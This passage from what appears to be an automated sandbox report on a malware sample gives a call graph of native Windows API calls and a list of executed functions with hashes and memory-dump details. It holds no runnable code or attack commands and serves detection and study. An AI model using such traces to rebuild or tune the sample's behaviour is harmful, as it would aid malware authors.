99733 41458a 99736 41a490 2 API calls 99733->99736 99735->99725 99738 414593 99736->99738 99737->99732 99737->99733 99739 4145bf 99738->99739 99761 41bb90 99738->99761 99739->99656 99741 4145aa 99742 41bdc0 2 API calls 99741->99742 99743 4145b3 99742->99743 99743->99656 99744->99628 99745->99650 99747 41af60 LdrLoadDll 99746->99747 99748 414d04 99747->99748 99749 41a320 LdrLoadDll 99748->99749 99749->99652 99751 41a4ac NtClose 99750->99751 99752 41af60 LdrLoadDll 99750->99752 99751->99657 99752->99751 99753->99637 99754->99701 99757 41bfa8 99755->99757 99768 41a630 99755->99768 99757->99730 99759 41a42c NtReadFile 99758->99759 99760 41af60 LdrLoadDll 99758->99760 99759->99731 99760->99759 99762 41bbb4 99761->99762 99763 41bb9d 99761->99763 99762->99741 99763->99762 99764 41bf90 2 API calls 99763->99764 99765 41bbcb 99764->99765 99765->99741 99766->99737 99767->99718 99769 41af60 LdrLoadDll 99768->99769 99770 41a64c RtlAllocateHeap 99769->99770 99770->99757 99772 41bd65 99771->99772 99902 41a540 99772->99902 99774 41bd6d 99774->99662 99776 414071 99775->99776 99778 414079 99775->99778 99776->99665 99777 41434c 99777->99665 99778->99777 99905 41cf30 99778->99905 99780 4140cd 99781 41cf30 2 API calls 99780->99781 99785 4140d8 99781->99785 99782 414126 99784 41cf30 2 API calls 99782->99784 99788 41413a 99784->99788 99785->99782 99786 41d060 3 API calls 99785->99786 99916 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 99785->99916 99786->99785 99787 414197 99789 41cf30 2 API calls 99787->99789 99788->99787 99910 41d060 99788->99910 99790 4141ad 99789->99790 99792 4141ea 99790->99792 99794 41d060 3 API calls 99790->99794 99793 41cf30 2 API calls 99792->99793 99795 4141f5 99793->99795 99794->99790 99796 41d060 3 API calls 99795->99796 99802 41422f 99795->99802 99796->99795 99798 414324 99918 41cf90 LdrLoadDll RtlFreeHeap 99798->99918 99800 41432e 99919 41cf90 LdrLoadDll RtlFreeHeap 99800->99919 99917 41cf90 LdrLoadDll RtlFreeHeap 99802->99917 99803 414338 99920 41cf90 LdrLoadDll RtlFreeHeap 99803->99920 99805 414342 99921 41cf90 LdrLoadDll RtlFreeHeap 99805->99921 99808 415391 99807->99808 99809 414a40 8 API calls 99808->99809 99811 4153a7 99809->99811 99810 4153fa 99810->99668 99811->99810 99812 4153e2 99811->99812 99813 4153f5 99811->99813 99814 41bdc0 2 API calls 99812->99814 99815 41bdc0 2 API calls 99813->99815 99816 4153e7 99814->99816 99815->99810 99816->99668 99818 41ad84 99817->99818 99819 41ac30 LdrLoadDll 99817->99819 99922 41ac30 99818->99922 99819->99818 99821 41ad8d 99822 41ac30 LdrLoadDll 99821->99822 99823 41ad96 99822->99823 99824 41ac30 LdrLoadDll 99823->99824 99825 41ad9f 99824->99825 99826 41ac30 LdrLoadDll 99825->99826 99827 41ada8 99826->99827 99828 41ac30 LdrLoadDll 99827->99828 99829 41adb1 99828->99829 99830 41ac30 LdrLoadDll 99829->99830 99831 41adbd 99830->99831 99832 41ac30 LdrLoadDll 99831->99832 99833 41adc6 99832->99833 99834 41ac30 LdrLoadDll 99833->99834 99835 41adcf 99834->99835 99836 41ac30 LdrLoadDll 99835->99836 99837 41add8 99836->99837 99838 41ac30 LdrLoadDll 99837->99838 99839 41ade1 99838->99839 99840 41ac30 LdrLoadDll 99839->99840 99841 41adea 99840->99841 99842 41ac30 LdrLoadDll 99841->99842 99843 41adf6 99842->99843 99844 41ac30 LdrLoadDll 99843->99844 99845 41adff 99844->99845 99846 41ac30 LdrLoadDll 99845->99846 99847 41ae08 99846->99847 99848 41ac30 LdrLoadDll 99847->99848 99849 41ae11 99848->99849 99850 41ac30 LdrLoadDll 99849->99850 99851 41ae1a 99850->99851 99852 41ac30 LdrLoadDll 99851->99852 99853 41ae23 99852->99853 99854 41ac30 LdrLoadDll 99853->99854 99855 41ae2f 99854->99855 99856 41ac30 LdrLoadDll 99855->99856 99857 41ae38 99856->99857 99858 41ac30 LdrLoadDll 99857->99858 99859 41ae41 99858->99859 99860 41ac30 LdrLoadDll 99859->99860 99861 41ae4a 99860->99861 99862 41ac30 LdrLoadDll 99861->99862 99863 41ae53 99862->99863 99864 41ac30 LdrLoadDll 99863->99864 99865 41ae5c 99864->99865 99866 41ac30 LdrLoadDll 99865->99866 99867 41ae68 99866->99867 99868 41ac30 LdrLoadDll 99867->99868 99869 41ae71 99868->99869 99870 41ac30 LdrLoadDll 99869->99870 99871 41ae7a 99870->99871 99872 41ac30 LdrLoadDll 99871->99872 99873 41ae83 99872->99873 99874 41ac30 LdrLoadDll 99873->99874 99875 41ae8c 99874->99875 99876 41ac30 LdrLoadDll 99875->99876 99877 41ae95 99876->99877 99878 41ac30 LdrLoadDll 99877->99878 99879 41aea1 99878->99879 99880 41ac30 LdrLoadDll 99879->99880 99881 41aeaa 99880->99881 99882 41ac30 LdrLoadDll 99881->99882 99883 41aeb3 99882->99883 99884 41ac30 LdrLoadDll 99883->99884 99885 41aebc 99884->99885 99886 41ac30 LdrLoadDll 99885->99886 99887 41aec5 99886->99887 99888 41ac30 LdrLoadDll 99887->99888 99889 41aece 99888->99889 99890 41ac30 LdrLoadDll 99889->99890 99891 41aeda 99890->99891 99892 41ac30 LdrLoadDll 99891->99892 99893 41aee3 99892->99893 99894 41ac30 LdrLoadDll 99893->99894 99895 41aeec 99894->99895 99895->99673 99897 41af60 LdrLoadDll 99896->99897 99898 419edc 99897->99898 99928 1102df0 LdrInitializeThunk 99898->99928 99899 419ef3 99899->99594 99901->99670 99903 41af60 LdrLoadDll 99902->99903 99904 41a55c NtAllocateVirtualMemory 99903->99904 99904->99774 99906 41cf40 99905->99906 99907 41cf46 99905->99907 99906->99780 99908 41bf90 2 API calls 99907->99908 99909 41cf6c 99908->99909 99909->99780 99911 41cfd0 99910->99911 99912 41d02d 99911->99912 99913 41bf90 2 API calls 99911->99913 99912->99788 99914 41d00a 99913->99914 99915 41bdc0 2 API calls 99914->99915 99915->99912 99916->99785 99917->99798 99918->99800 99919->99803 99920->99805 99921->99777 99923 41ac4b 99922->99923 99924 414e40 LdrLoadDll 99923->99924 99925 41ac6b 99924->99925 99926 414e40 LdrLoadDll 99925->99926 99927 41ad17 99925->99927 99926->99927 99927->99821 99927->99927 99928->99899 99930 1102c11 99929->99930 99931 1102c1f LdrInitializeThunk 99929->99931 99930->99679 99931->99679 99933 41a68c RtlFreeHeap 99932->99933 99934 41af60 LdrLoadDll 99932->99934 99933->99683 99934->99933 99936 407eb0 99935->99936 99937 407eab 99935->99937 99938 41bd40 2 API calls 99936->99938 99937->99602 99939 407ed5 99938->99939 99940 407f38 99939->99940 99941 419ec0 2 API calls 99939->99941 99942 407f3e 99939->99942 99946 41bd40 2 API calls 99939->99946 99951 41a5c0 99939->99951 99940->99602 99941->99939 99944 407f64 99942->99944 99945 41a5c0 2 API calls 99942->99945 99944->99602 99947 407f55 99945->99947 99946->99939 99947->99602 99949 41a5c0 2 API calls 99948->99949 99950 40817e 99949->99950 99950->99559 99952 41af60 LdrLoadDll 99951->99952 99953 41a5dc 99952->99953 99956 1102c70 LdrInitializeThunk 99953->99956 99954 41a5f3 99954->99939 99956->99954 99958 41b5c3 99957->99958 99961 40ace0 99958->99961 99960 409c3a 99960->99565 99963 40ad04 99961->99963 99962 40ad0b 99962->99960 99963->99962 99964 40ad40 LdrLoadDll 99963->99964 99965 40ad57 99963->99965 99964->99965 99965->99960 99967 40b053 99966->99967 99969 40b0d0 99967->99969 99981 419c90 LdrLoadDll 99967->99981 99969->99572 99971 41af60 LdrLoadDll 99970->99971 99972 40f1ab 99971->99972 99972->99575 99973 41a7d0 99972->99973 99974 41af60 LdrLoadDll 99973->99974 99975 41a7ef LookupPrivilegeValueW 99974->99975 99975->99577 99977 41a27c 99976->99977 99978 41af60 LdrLoadDll 99976->99978 99982 1102ea0 LdrInitializeThunk 99977->99982 99978->99977 99979 41a29b 99979->99578 99981->99969 99982->99979 99984 40b1b9 99983->99984 99985 40b030 LdrLoadDll 99984->99985 99986 40b1f4 99985->99986 99986->99514 99988 40ae41 99987->99988 99989 40ae3d 99987->99989 99990 40ae5a 99988->99990 99991 40ae8c 99988->99991 99989->99516 100033 419cd0 LdrLoadDll 99990->100033 100034 419cd0 LdrLoadDll 99991->100034 99993 40ae9d 99993->99516 99995 40ae7c 99995->99516 99997 40f490 3 API calls 99996->99997 99998 4143b6 99996->99998 99997->99998 99998->99518 100000 408a79 99999->100000 100035 4087a0 99999->100035 100002 4087a0 19 API calls 100000->100002 100005 408a9d 100000->100005 100003 408a8a 100002->100003 100003->100005 100053 40f700 10 API calls 100003->100053 100005->99520 100007 41af60 LdrLoadDll 100006->100007 100008 41a51c 100007->100008 100173 1102e80 LdrInitializeThunk 100008->100173 100009 40c312 100011 40f490 100009->100011 100012 40f4ad 100011->100012 100174 419fc0 100012->100174 100015 40f4f5 100015->99524 100016 41a010 2 API calls 100017 40f51e 100016->100017 100017->99524 100019 41af60 LdrLoadDll 100018->100019 100020 41a02c 100019->100020 100180 1102d10 LdrInitializeThunk 100020->100180 100021 40c375 100021->99530 100021->99533 100024 41af60 LdrLoadDll 100023->100024 100025 41a07c 100024->100025 100181 1102d30 LdrInitializeThunk 100025->100181 100026 40c449 100026->99541 100029 41af60 LdrLoadDll 100028->100029 100030 419e3c 100029->100030 100182 1102fb0 LdrInitializeThunk 100030->100182 100031 40c49c 100031->99545 100033->99995 100034->99993 100036 407ea0 4 API calls 100035->100036 100051 4087ba 100036->100051 100037 408a3f 100038 408160 2 API calls 100037->100038 100039 408a49 100038->100039 100039->100000 100042 419f00 2 API calls 100042->100051 100044 41a490 LdrLoadDll NtClose 100044->100051 100047 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100047->100051 100050 419e20 2 API calls 100050->100051 100051->100037 100051->100039 100051->100042 100051->100044 100051->100047 100051->100050 100054 419d10 100051->100054 100057 4085d0 100051->100057 100069 40f5e0 LdrLoadDll NtClose 100051->100069 100070 419d90 LdrLoadDll 100051->100070 100071 419dc0 LdrLoadDll 100051->100071 100072 419e50 LdrLoadDll 100051->100072 100073 4083a0 100051->100073 100089 405f60 LdrLoadDll 100051->100089 100053->100005 100055 41af60 LdrLoadDll 100054->100055 100056 419d2c 100055->100056 100056->100051 100058 4085e6 100057->100058 100090 419880 100058->100090 100060 4085ff 100065 408771 100060->100065 100111 4081a0 100060->100111 100062 4086e5 100063 4083a0 11 API calls 100062->100063 100062->100065 100064 408713 100063->100064 100064->100065 100066 419f00 2 API calls 100064->100066 100065->100051 100067 408748 100066->100067 100067->100065 100068 41a500 2 API calls 100067->100068 100068->100065 100069->100051 100070->100051 100071->100051 100072->100051 100074 4083c9 100073->100074 100152 408310 100074->100152 100077 41a500 2 API calls 100078 4083dc 100077->100078 100078->100077 100079 408467 100078->100079 100082 408462 100078->100082 100160 40f660 100078->100160 100079->100051 100080 41a490 2 API calls 100081 40849a 100080->100081 100081->100079 100083 419d10 LdrLoadDll 100081->100083 100082->100080 100084 4084ff 100083->100084 100084->100079 100164 419d50 100084->100164 100086 408563 100086->100079 100087 414a40 8 API calls 100086->100087 100088 4085b8 100087->100088 100088->100051 100089->100051 100091 41bf90 2 API calls 100090->100091 100092 419897 100091->100092 100118 409310 100092->100118 100094 4198b2 100095 4198f0 100094->100095 100096 4198d9 100094->100096 100099 41bd40 2 API calls 100095->100099 100097 41bdc0 2 API calls 100096->100097 100098 4198e6 100097->100098 100098->100060 100100 41992a 100099->100100 100101 41bd40 2 API calls 100100->100101 100102 419943 100101->100102 100108 419be4 100102->100108 100124 41bd80 100102->100124 100105 419bd0 100106 41bdc0 2 API calls 100105->100106 100107 419bda 100106->100107 100107->100060 100109 41bdc0 2 API calls 100108->100109 100110 419c39 100109->100110 100110->100060 100112 40829f 100111->100112 100113 4081b5 100111->100113 100112->100062 100113->100112 100114 414a40 8 API calls 100113->100114 100115 408222 100114->100115 100116 41bdc0 2 API calls 100115->100116 100117 408249 100115->100117 100116->100117 100117->100062 100119 409335 100118->100119 100120 40ace0 LdrLoadDll 100119->100120 100121 409368 100120->100121 100123 40938d 100121->100123 100127 40cf10 100121->100127 100123->100094 100145 41a580 100124->100145 100128 40cf3c 100127->100128 100129 41a1e0 LdrLoadDll 100128->100129 100130 40cf55 100129->100130 100131 40cf5c 100130->100131 100138 41a220 100130->100138 100131->100123 100135 40cf97 100136 41a490 2 API calls 100135->100136 100137 40cfba 100136->100137 100137->100123 100139 41af60 LdrLoadDll 100138->100139 100140 41a23c 100139->100140 100144 1102ca0 LdrInitializeThunk 100140->100144 100141 40cf7f 100141->100131 100143 41a810 LdrLoadDll 100141->100143 100143->100135 100144->100141 100146 41a595 100145->100146 100147 41af60 LdrLoadDll 100146->100147 100148 41a59c 100147->100148 100151 1102f90 LdrInitializeThunk 100148->100151 100149 419bc9 100149->100105 100149->100108 100151->100149 100153 408328 100152->100153 100154 40ace0 LdrLoadDll 100153->100154 100155 408343 100154->100155 100156 414e40 LdrLoadDll 100155->100156 100157 408353 100156->100157 100158 40835c PostThreadMessageW 100157->100158 100159 408370 100157->100159 100158->100159 100159->100078 100161 40f673 100160->100161 100167 419e90 100161->100167 100165 419d6c 100164->100165 100166 41af60 LdrLoadDll 100164->100166 100165->100086 100166->100165 100168 419eac 100167->100168 100169 41af60 LdrLoadDll 100167->100169 100172 1102dd0 LdrInitializeThunk 100168->100172 100169->100168 100170 40f69e 100170->100078 100172->100170 100173->100009 100175 41af60 LdrLoadDll 100174->100175 100176 419fdc 100175->100176 100177 40f4ee 100176->100177 100179 1102f30 LdrInitializeThunk 100176->100179 100177->100015 100177->100016 100179->100177 100180->100021 100181->100026 100182->100031

                                                      Executed Functions

                                                      Function 0041A40B Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 41a40b-41a459 call 41af60 NtReadFile
                                                      APIs
                                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A455
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: !JA$bMA$bMA
                                                      • API String ID: 2738559852-4222312340
                                                      • Opcode ID: 20313963af024c615700d76e46f1c16b80ebe2a678971241950cdfb15c79abed
                                                      • Instruction ID: ced4471a4ad639366d53666acf2a20fd0df491fb81fbb65912225195025b137a
                                                      • Opcode Fuzzy Hash: 20313963af024c615700d76e46f1c16b80ebe2a678971241950cdfb15c79abed
                                                      • Instruction Fuzzy Hash: 16F0C9B1200108AFCB14CF99CC85DDBB7A9EF8C354F158248B91DA7245D630E811CBA0
                                                      Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                                                      APIs
                                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A455
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: !JA$bMA$bMA
                                                      • API String ID: 2738559852-4222312340
                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                      Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 234 40ace0-40acfc 235 40ad04-40ad09 234->235 236 40acff call 41cc50 234->236 237 40ad0b-40ad0e 235->237 238 40ad0f-40ad1d call 41d070 235->238 236->235 241 40ad2d-40ad3e call 41b4a0 238->241 242 40ad1f-40ad2a call 41d2f0 238->242 247 40ad40-40ad54 LdrLoadDll 241->247 248 40ad57-40ad5a 241->248 242->241 247->248
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                                                      • Instruction ID: d67f1bdabad64084b5c4bffe625ae792a434af5b5f697ea898bfaa5690ad8bd1
                                                      • Opcode Fuzzy Hash: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                                                      • Instruction Fuzzy Hash: 35015EB5E0020DABDF10EBA1DC42FDEB3789F14308F0041AAE908A7281F634EB54CB95
                                                      Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 249 41a360-41a3b1 call 41af60 NtCreateFile
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A3AD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                      Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 252 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A579
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                      Function 0041A48A Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 264 41a48a-41a4b9 call 41af60 NtClose
                                                      APIs
                                                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4B5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: d32bc822461819c6a7752db4da68354b3548de13911733acaf1a0b72f52fe8b4
                                                      • Instruction ID: 9b4dbc26645dc4470c945089ede39bb5ce3be025d73a1c6659f34b0ab2fdb9dd
                                                      • Opcode Fuzzy Hash: d32bc822461819c6a7752db4da68354b3548de13911733acaf1a0b72f52fe8b4
                                                      • Instruction Fuzzy Hash: 70E08C76240204ABE710EB94CC85EE77B68EB48620F24845ABA5C5B242C630EA0187D0
                                                      Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 267 41a490-41a4a6 268 41a4ac-41a4b9 NtClose 267->268 269 41a4a7 call 41af60 267->269 269->268
                                                      APIs
                                                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4B5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1452676761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_AB2hQJZ77ipdWem.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                      Function 01102B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                      • Instruction ID: 380b514f1b228bc081d75c17ae9254c2119d2321acb5c64e8da0945d2a3bd4e4
                                                      • Opcode Fuzzy Hash: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                      • Instruction Fuzzy Hash: 9B90026224240003410971585514616900A97E1201B55C031E1015590DC72589916225
                                                      Function 01102BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                      • Instruction ID: a97d590cc2441fe97374a348ef225c0c7b530a9c885c9f327d0efe79fc82d833
                                                      • Opcode Fuzzy Hash: 1623aa7e25c4266ea722206d5babad02515c3f86758c16eb13be7d051b3a3ee7
                                                      • Instruction Fuzzy Hash: 1090023224140803D1847158550464A500597D2301F95C025A0026654DCB158B5977A1
                                                      Function 01102AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                      • Instruction ID: bb80ee6a644a4d13a241bcf70687e77adda06130dc58ec189013a52a0ca52534
                                                      • Opcode Fuzzy Hash: 4902618203c84a710a8302ec44253152e3bbfbddbe42948af5055c18d0b3a7cc
                                                      • Instruction Fuzzy Hash: FA90043735140003010DF55C17045075047D7D7351355C031F1017550CD731CD715331
                                                      Function 01102D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                      • Instruction ID: 47ec783c13350d00c6fecb8df1eda0765404297098ef74f093caedf616d7b3c8
                                                      • Opcode Fuzzy Hash: ef9038fa33cb8374523abc3e5b788f83910b3f494c4b44705fac9a0ef2255aa6
                                                      • Instruction Fuzzy Hash: 7390022A25340003D1847158650860A500597D2202F95D425A0016558CCB1589695321
                                                      Function 01102D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                      • Instruction ID: 4d7fbd2b61014b47c020f5326d3fb0c5a9d228e24a8ab57affeee595efea0222
                                                      • Opcode Fuzzy Hash: 36c7e015217356c5cfe5b64f3738de4e8acae833bc7ffce00d284161325ef9a2
                                                      • Instruction Fuzzy Hash: 8D90022234140003D144715865186069005E7E2301F55D021E0415554CDB1589565322
                                                      Function 01102DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                      • Instruction ID: 07ec84986e349e873418cc0b275f2fe9209d884e2788ae7c54a8e750c7e0b0bb
                                                      • Opcode Fuzzy Hash: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                      • Instruction Fuzzy Hash: D1900222282441535549B15855045079006A7E1241795C022A1415950CC7269956D721
                                                      Function 01102DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
